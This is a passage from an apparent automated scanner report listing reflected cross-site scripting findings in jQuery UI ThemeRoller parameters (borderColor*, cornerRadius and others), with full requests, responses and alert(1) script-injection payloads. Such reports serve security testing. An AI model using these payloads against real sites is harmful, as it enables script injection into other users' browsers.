User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.pngaa510"><script>alert(1)</script>0bdc0f1fe04&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.39. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83abc"><script>alert(1)</script>c8f0c5f0c21 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC83abc"><script>alert(1)</script>c8f0c5f0c21&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ghlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC83abc"><script>alert(1)</script>c8f0c5f0c21&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000
...[SNIP]...

3.40. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2458c"><script>alert(1)</script>1e2146c3dca was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC2458c"><script>alert(1)</script>1e2146c3dca&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
light_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC2458c"><script>alert(1)</script>1e2146c3dca&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorH
...[SNIP]...

3.41. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de03"><script>alert(1)</script>591a2eed492 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF1de03"><script>alert(1)</script>591a2eed492&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF1de03"><script>alert(1)</script>591a2eed492&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8
...[SNIP]...

3.42. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e98"><script>alert(1)</script>00c7bbe14b6 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B1000029e98"><script>alert(1)</script>00c7bbe14b6&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B1000029e98"><script>alert(1)</script>00c7bbe14b6&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&
...[SNIP]...

3.43. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6583"><script>alert(1)</script>bd50e49b25f was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDDc6583"><script>alert(1)</script>bd50e49b25f&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDDc6583"><script>alert(1)</script>bd50e49b25f&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AA
...[SNIP]...

3.44. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7663a"><script>alert(1)</script>6663ea94d2a was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9367663a"><script>alert(1)</script>6663ea94d2a&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
mgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9367663a"><script>alert(1)</script>6663ea94d2a&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgT
...[SNIP]...

3.45. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98ea6"><script>alert(1)</script>bc04b692349 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF98ea6"><script>alert(1)</script>bc04b692349&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF98ea6"><script>alert(1)</script>bc04b692349&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC
...[SNIP]...

3.46. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efcfe"><script>alert(1)</script>d490bc83fc4 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7pxefcfe"><script>alert(1)</script>d490bc83fc4&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7pxefcfe"><script>alert(1)</script>d490bc83fc4&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.47. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c97b"><script>alert(1)</script>605cd6750bd was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thickne